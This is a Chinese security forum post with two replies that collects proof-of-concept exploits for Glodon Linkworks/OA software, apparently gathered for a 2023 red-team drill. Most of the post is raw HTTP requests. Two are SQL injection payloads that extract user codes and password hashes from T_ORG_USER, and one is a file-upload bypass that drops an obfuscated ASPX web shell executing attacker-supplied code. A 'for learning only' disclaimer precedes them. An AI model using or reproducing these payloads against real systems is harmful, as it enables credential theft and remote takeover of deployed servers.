请选择 进入手机版 | 继续访问电脑版

DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 2295|回复: 2

[2023HW] 广联达漏洞 PoC 整理

[复制链接]

177

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
343
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 22:16:50 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

广联达 Linkworks GetIMDictionary SQL 注入漏洞


  1. POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
  2. Host:
  3. Content-Type: application/x-www-form-urlencoded
  4. key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
复制代码

广联达 OA 后台文件上传漏洞


  1. POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
  2. Host: 10.10.10.1:8888
  3. X-Requested-With: Ext.basex
  4. Accept: text/html, application/xhtml+xml, image/jxr, */*
  5. Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
  6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
  7. Accept-Encoding: gzip, deflate
  8. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
  9. Accept: */*
  10. Origin: http://10.10.10.1
  11. Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
  12. Cookie:
  13. Connection: close
  14. Content-Length: 421

  15. ------WebKitFormBoundaryFfJZ4PlAZBixjELj
  16. Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
  17. Content-Type: application/text

  18. <%@ Page Language="Jscript" Debug=true%>
  19. <%
  20. var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
  21. var GFMA=Request.Form("qmq1");
  22. var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
  23. eval(GFMA, ONOQ);
  24. %>

  25. ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
复制代码

广联达 OA SQL 注入漏洞


  1. POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
  2. Host: xxx.com
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
  5. Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  6. Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Cookie:
  10. Connection: close
  11. Content-Type: application/x-www-form-urlencoded
  12. Content-Length: 88

  13. dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
复制代码

3

主题

10

回帖

0

荣誉

Rank: 1

UID
503
积分
11
精华
0
沃币
2 枚
注册时间
2022-4-25
发表于 2023-8-18 12:30:38 | 显示全部楼层
感谢分享
回复

使用道具 举报

0

主题

11

回帖

0

荣誉

Rank: 1

UID
1429
积分
2
精华
0
沃币
9 枚
注册时间
2023-8-10
发表于 2023-8-28 17:41:02 | 显示全部楼层
都是很SQL 漏洞
产权交易 https://www.ejy365.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1楼
2楼
3楼

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-6-22 23:24 , Processed in 0.070713 second(s), 23 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表